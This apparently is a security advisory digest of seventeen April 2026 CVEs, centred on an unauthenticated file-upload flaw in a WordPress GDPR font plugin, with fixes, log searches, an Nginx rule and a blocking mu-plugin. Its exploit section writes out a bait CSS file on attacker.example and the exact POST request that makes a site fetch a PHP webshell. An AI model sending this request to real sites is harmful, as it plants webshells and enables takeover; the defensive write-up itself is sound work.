
April 8-9, 2026 vulnerability digest: GDPR compliance plugin opens WordPress sites to unauthenticated RCE

By Artem Safonov, Threat Analyst
Cover © Anonhaven

Seventeen vulnerabilities received CVE identifiers across April 8 and 9, 2026. Sixteen affect WordPress plugins. One affects an industrial utility from Moxa. The most severe entry is CVE-2026-3535, a CVSS 9.8 unauthenticated arbitrary file upload.

The vulnerable plugin is DSGVO Google Web Fonts GDPR. It downloads Google Fonts to the local server and rewrites theme stylesheets to use the local copies. Site owners install it after a 2022 German court ruled that font requests to Google leaked visitor IP addresses in violation of GDPR. Nabil Irawan of Heroes Cyber Security discovered the flaw.

The vulnerable function

The break sits in DSGVOGWPdownloadGoogleFonts() in dsgvo-google-web-fonts-gdpr.php. Wordfence and Managed-WP advisories trace it to lines 46 and 159 of version 1.1. The function is registered through a wp_ajax_nopriv_ hook, which means any unauthenticated visitor can call it through admin-ajax.php.

The intended workflow looks reasonable in isolation. An administrator clicks a button in the plugin settings. The plugin fetches the Google Fonts CSS URL referenced by the active theme. It parses out the actual font file URLs from inside the CSS.

The plugin then downloads those font files to the local server. It generates a new local CSS file in the theme directory and blocks the original calls to Google's font servers.

The break is that none of the assumptions in this workflow are enforced. The function does not verify that the caller is logged in. It does not verify that the supplied URL points to a Google host. It does not verify that the response body is actually CSS.

The function also skips checks on the URLs extracted from the body. It does not verify the MIME type, magic bytes, or extension of the files it downloads before saving them to disk.

An attacker hosts a small file at https://attacker.example/fake.css containing one line.

@font-face { src: url('https://attacker.example/shell.php'); }

The attacker sends a single unauthenticated POST request.

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.example
Content-Type: application/x-www-form-urlencoded

action=DSGVOGWPdownloadGoogleFonts&fonturl=https://attacker.example/fake.css

The plugin fetches the bait CSS and extracts the URL from inside the response. It downloads shell.php and writes it to a publicly accessible directory inside the active theme. The attacker then loads the saved file via its public URL on the victim site, and the webshell runs under the PHP-FPM or Apache user. From there the path runs through wp-config.php credentials, the user table, persistence, and pivot.

The theme constraint

Exploitation requires the site to use one of six themes. The advisory lists twentyfifteen, twentysixteen, twentyseventeen, storefront, salient, and shapely. The plugin's free version explicitly only supports these themes per its own description on the WordPress.org repository. The constraint relates to how the plugin handles theme-specific font asset paths and is not a security feature.

This narrows the attack surface but does not eliminate it. An attacker scanning at scale fingerprints the active theme through the standard generator meta tag. The same data is available by checking known theme asset paths. Mass exploitation campaigns automate this step routinely.

No patch at the time of writing

The advisory lists all versions up to and including 1.1 as affected with no fixed version. The plugin appears to be unmaintained. Site owners should remove it immediately and switch to OMGF or Local Google Fonts, both of which provide GDPR-compliant local font hosting with active maintenance. OMGF had its own high-severity issue disclosed in early 2024 but ships regular updates.

A correct fix for this vulnerability class requires several controls layered together. Replace wp_ajax_nopriv_ with wp_ajax_ so only authenticated users can call the function. Add a capability check (current_user_can('manage_options')) to restrict the action to administrators. Add a nonce check (check_ajax_referer()) to prevent CSRF.

The plugin should validate the supplied URL's host against an allowlist. Only fonts.googleapis.com and fonts.gstatic.com should be permitted. Downloaded files need MIME type or extension checks against a font-specific list before saving.
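A handler that layers those controls together, written here as an added example and not taken from the plugin: the action name gwf_download_fonts, the nonce action gwf_download, the helper names and the fonts/ subdirectory of the active theme are all hypothetical. It accepts only HTTPS URLs on the two Google hosts (for the CSS and for every font URL extracted from it), requires a font extension, and checks the downloaded body's magic bytes before writing anything to disk.

```php
<?php
add_action( 'wp_ajax_gwf_download_fonts', 'gwf_download_fonts_hardened' ); // no _nopriv variant
// Both the CSS URL and every font URL extracted from it must point at these hosts.
const GWF_ALLOWED_HOSTS = array( 'fonts.googleapis.com', 'fonts.gstatic.com' );
// Accepted extensions and the magic bytes each downloaded body must start with.
const GWF_FONT_MAGIC = array(
    'woff2' => 'wOF2', 'woff' => 'wOFF', 'ttf' => "\x00\x01\x00\x00", 'otf' => 'OTTO',
);
function gwf_url_allowed( $url ) {
    $p = wp_parse_url( $url );
    return isset( $p['scheme'], $p['host'] ) && 'https' === $p['scheme']
        && in_array( strtolower( $p['host'] ), GWF_ALLOWED_HOSTS, true );
}

function gwf_download_fonts_hardened() {
    check_ajax_referer( 'gwf_download', 'nonce' );        // CSRF: dies on a missing or stale nonce
    if ( ! current_user_can( 'manage_options' ) ) {      // authorization: administrators only
        wp_send_json_error( 'forbidden', 403 );
    }
    $css_url = isset( $_POST['fonturl'] ) ? esc_url_raw( wp_unslash( $_POST['fonturl'] ) ) : '';
    if ( ! gwf_url_allowed( $css_url ) ) {
        wp_send_json_error( 'fonturl host not allowed', 400 );
    }
    $resp = wp_safe_remote_get( $css_url, array( 'timeout' => 10 ) );
    if ( is_wp_error( $resp ) || 200 !== wp_remote_retrieve_response_code( $resp ) ) {
        wp_send_json_error( 'fetch failed', 502 );
    }
    if ( ! preg_match_all( '/url\(\s*[\'"]?(https:\/\/[^\'")\s]+)/i', wp_remote_retrieve_body( $resp ), $m ) ) {
        wp_send_json_error( 'no font urls in css', 400 );
    }
    $dir = trailingslashit( get_stylesheet_directory() ) . 'fonts/'; // hypothetical target directory
    wp_mkdir_p( $dir );
    $saved = array();
    foreach ( array_unique( $m[1] ) as $font_url ) {
        $path = (string) wp_parse_url( $font_url, PHP_URL_PATH );
        $ext  = strtolower( pathinfo( $path, PATHINFO_EXTENSION ) );
        if ( ! gwf_url_allowed( $font_url ) || ! isset( GWF_FONT_MAGIC[ $ext ] ) ) {
            continue;                                     // off-allowlist host or non-font extension
        }
        $body = wp_remote_retrieve_body( wp_safe_remote_get( $font_url, array( 'timeout' => 10 ) ) );
        if ( '' === $body || 0 !== strpos( $body, GWF_FONT_MAGIC[ $ext ] ) ) {
            continue;                                     // body does not match the claimed font format
        }
        $name = sanitize_file_name( basename( $path ) );  // basename is non-empty because $ext matched
        file_put_contents( $dir . $name, $body );
        $saved[] = $name;
    }
    wp_send_json_success( $saved );
}
```

The admin page that triggers this handler has to send the nonce (wp_create_nonce( 'gwf_download' )) as the nonce field, otherwise check_ajax_referer() rejects the call.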

Missing file type validation has been the most common class of critical bugs in WordPress plugins for years, and it shows up most often in helper plugins built around a single small task. The DSGVO font case is the structural reason vulnerability digests keep listing more WordPress plugins than everything else combined.

— Artem Safonov, Threat Analyst at AnonHaven

Audit and detection

Search WordPress access logs for requests to admin-ajax.php with the fonturl parameter or the function name.

zgrep -i "fonturl=" /var/log/nginx/*access.log*
zgrep -i "DSGVOGWPdownloadGoogleFonts" /var/log/nginx/*access.log*

Check the active theme's directory for unexpected PHP files. Pay special attention to fonts/ subdirectories. Add a server-level rule preventing PHP execution inside theme asset directories. For Nginx the rule looks like this.

location ~* /wp-content/themes/.*/fonts/.*\.php$ {
    deny all;
}

The Nginx rule is a defense-in-depth control. It breaks the exploit chain even when a malicious file is successfully written. Nginx evaluates regex locations in the order they appear and takes the first match, so this block has to come before the generic `\.php$` location that hands requests to PHP-FPM. WAF rules should block unauthenticated requests to admin-ajax.php with action=DSGVOGWPdownloadGoogleFonts.
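For sites that cannot remove the plugin the same minute the digest lands, the WAF rule above can also be enforced inside WordPress itself. This is an added example, not the plugin's or AnonHaven's code: a must-use plugin (drop it into wp-content/mu-plugins/ under any file name) that rejects admin-ajax.php calls carrying the action value from the digest unless the caller already holds manage_options. The constant and function names are hypothetical; the action value is the one in the request shown earlier.

```php
<?php
/**
 * Plugin Name: Interim block for unauthenticated DSGVO font downloads
 * mu-plugins load before ordinary plugins and cannot be deactivated from the dashboard,
 * which is what makes them suitable for a stop-gap like this.
 */

// The action value from the exploit request described in the digest.
const GWF_BLOCKED_ACTION = 'DSGVOGWPdownloadGoogleFonts';

// Pure decision function: true when an admin-ajax call carries the blocked action and the
// caller lacks the capability the download would need. Separate from the hook so it can
// be exercised without a running WordPress.
function gwf_should_block( $doing_ajax, $request, $caller_is_admin ) {
    $action = isset( $request['action'] ) ? (string) $request['action'] : '';
    return $doing_ajax && GWF_BLOCKED_ACTION === $action && ! $caller_is_admin;
}

// admin-ajax.php fires admin_init after the user is resolved and before it dispatches any
// wp_ajax_ or wp_ajax_nopriv_ hook, so a wp_die() here prevents the handler from running at all.
add_action( 'admin_init', function () {
    $request = array_merge( $_GET, $_POST );
    if ( gwf_should_block( wp_doing_ajax(), $request, current_user_can( 'manage_options' ) ) ) {
        error_log( sprintf( 'blocked %s from %s', GWF_BLOCKED_ACTION, $_SERVER['REMOTE_ADDR'] ?? '-' ) );
        wp_die( 'Forbidden', 'Forbidden', array( 'response' => 403 ) );
    }
}, 0 );
```

The error_log() line gives the same signal as the zgrep searches above but from inside PHP, so it also fires when the web server sits behind a proxy that rewrites or drops the query string from its access log.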

If compromise indicators are found, rotate database credentials immediately. Regenerate WordPress salts in wp-config.php. Rotate any API keys stored in the WordPress database. Restore from a verified clean backup if possible.

A second file upload bug in the same window

CVE-2026-4808 is a CVSS 7.2 arbitrary file upload in the Gerador de Certificados — DevApps plugin, a Brazilian-market certificate generation tool. The bug class is identical to CVE-2026-3535. The lower score reflects more constrained exploitation prerequisites. The underlying mechanism is the same.

Two unrelated developers received CVE identifiers for the same defect class in the same 48-hour window. This is not coordinated. It is the bug class reproducing across the WordPress plugin space reliably enough that two cases per week is statistically normal.

The only non-WordPress entry

CVE-2026-4483 is a CVSS 7.0 exposed IOCTL with insufficient access control in Moxa's MxGeneralIo utility. The utility ships for x86 industrial computers. Moxa published the advisory under reference MPSA-254811.

The flaw allows local privilege escalation through a driver IOCTL interface that does not verify caller privileges. The audience for this entry is operators of Moxa industrial PCs in OT environments, not WordPress administrators. Local privilege escalation through driver IOCTLs is a recurring class in industrial hardware utilities.

Missing authorization in WordPress plugins

Two entries in the digest are missing capability checks on plugin functions. Lower-privileged users can perform actions they should not be able to.

CVE-2026-3480, CVSS 6.5, WP Blockade Visual Page Builder, all versions up to and including 0.9.14.

CVE-2026-3477, CVSS 5.3, PZ Frontend Manager, all versions up to and including 1.0.6.

Both follow the standard pattern of a function exposed without a current_user_can() check.

SQL injection, information disclosure, broken access control, CSRF

CVE-2026-3781, CVSS 5.4, SQL injection in the Attendance Manager plugin through the attmgr_off parameter. SQL injection in WordPress plugins remains less frequent than XSS but is more dangerous in consequence. It can yield access to the user table, password hashes, and site metadata.

CVE-2026-3594, CVSS 5.3, sensitive information disclosure in the Riaxe Product Customizer plugin through an unauthenticated endpoint.

CVE-2026-5167, CVSS 5.3, broken access control in the Masteriyo LMS plugin affecting course content access. Notable because Masteriyo is used in educational institutions and may expose content intended for paid course participants.

CVE-2026-4141, CVSS 4.3, cross-site request forgery in the Quran Translations plugin in all versions up to and including 1.0.

Stored XSS through shortcode and block attributes

Seven stored XSS vulnerabilities sit in the CVSS 4.4–6.4 range. The mechanism is consistent across all of them. The plugin accepts user input through a shortcode or block attribute and renders it on a page without escaping.

CVE-2026-5506, CVSS 6.4, the Wavr plugin through the wave shortcode.

CVE-2026-3618, CVSS 6.4, Columns by BestWebSoft through a shortcode attribute.

CVE-2026-5508, CVSS 6.4, the WowPress plugin through the wowp shortcode.

CVE-2026-3142, CVSS 6.4, the Pinterest Site Verification using Meta Tag plugin.

CVE-2026-4871, CVSS 6.4, the Sports Club Management plugin through a shortcode attribute.

CVE-2026-2838, CVSS 4.4, the Whole Inquiry Cart for WooCommerce plugin.

CVE-2026-5169, CVSS 4.4, the Inquiry Form to Posts or Pages plugin.

Stored XSS through uploaded files

CVE-2025-1794, CVSS 5.4, stored XSS in the AM LottiePlayer plugin through uploaded Lottie animation files. This is the only entry in the digest carrying a 2025 identifier. The CVE number was assigned in 2025, but the description and CVSS score reached the public databases only in this April 8–9 window. The file-upload vector is more interesting than the shortcode XSS cluster, but exploitation still requires an authenticated uploader.

What this digest looks like in pattern

Sixteen of the seventeen vulnerabilities in this digest sit in WordPress plugins, matching a steady multi-year pattern. WordPress holds the largest share of the content management system market. Plugins are written by many different authors with varying security experience. The standard bug classes (missing file type validation, missing authorization, unescaped user input rendered through shortcodes) keep reproducing.

This does not mean WordPress core is insecure. The core team actively maintains the platform and has shipped automatic security updates since 2013. The recurring problem sits in the plugin space. Low developer barriers, no mandatory security review on WordPress.org, and a long tail of widely-installed plugins maintained by individuals keep producing the same bug classes.

A GDPR compliance helper that becomes an unauthenticated RCE primitive is the sharpest version of the WordPress plugin problem. Site owners install these tools to harden their privacy posture and end up with the opposite outcome, which is exactly the dynamic that keeps unmaintained niche plugins dangerous.

— Artem Safonov, Threat Analyst at AnonHaven

All 17 CVEs at a glance

| CVE | CVSS | Affected product | Class |
|---|---|---|---|
| CVE-2026-3535 | 9.8 | DSGVO Google Web Fonts GDPR | Unauth file upload / RCE |
| CVE-2026-4808 | 7.2 | Gerador de Certificados — DevApps | Arbitrary file upload |
| CVE-2026-4483 | 7.0 | Moxa MxGeneralIo | Local privesc via IOCTL |
| CVE-2026-3480 | 6.5 | WP Blockade Visual Page Builder | Missing authorization |
| CVE-2026-5506 | 6.4 | Wavr | Stored XSS (shortcode) |
| CVE-2026-3618 | 6.4 | Columns by BestWebSoft | Stored XSS (shortcode) |
| CVE-2026-5508 | 6.4 | WowPress | Stored XSS (shortcode) |
| CVE-2026-3142 | 6.4 | Pinterest Site Verification | Stored XSS |
| CVE-2026-4871 | 6.4 | Sports Club Management | Stored XSS (shortcode) |
| CVE-2026-3781 | 5.4 | Attendance Manager | SQL injection |
| CVE-2025-1794 | 5.4 | AM LottiePlayer | Stored XSS (file upload) |
| CVE-2026-3477 | 5.3 | PZ Frontend Manager | Missing authorization |
| CVE-2026-3594 | 5.3 | Riaxe Product Customizer | Information disclosure |
| CVE-2026-5167 | 5.3 | Masteriyo LMS | Broken access control |
| CVE-2026-2838 | 4.4 | Whole Inquiry Cart for WooCommerce | Stored XSS |
| CVE-2026-5169 | 4.4 | Inquiry Form to Posts or Pages | Stored XSS |
| CVE-2026-4141 | 4.3 | Quran Translations | CSRF |

What to do

WordPress administrators should open the installed plugins list and check for any entry from this digest. If the installed version falls in the vulnerable range, update to the patched version. If the developer has not shipped a fix, remove or disable the plugin. The DSGVO Google Web Fonts GDPR plugin requires immediate removal because no patch exists.

OT engineers running Moxa hardware should check the MxGeneralIo utility version. Consult the MPSA-254811 advisory for update guidance.

Everyone else can move on. The remaining 16 medium-severity entries are routine plugin maintenance: a concern for the specific affected sites, not a broad emergency.


Questions on the topic

What is CVE-2026-3535 in the DSGVO Google Web Fonts GDPR plugin?
CVE-2026-3535 is a CVSS 9.8 unauthenticated arbitrary file upload vulnerability in the DSGVO Google Web Fonts GDPR WordPress plugin that lets attackers upload PHP webshells through the fonturl parameter and achieve remote code execution.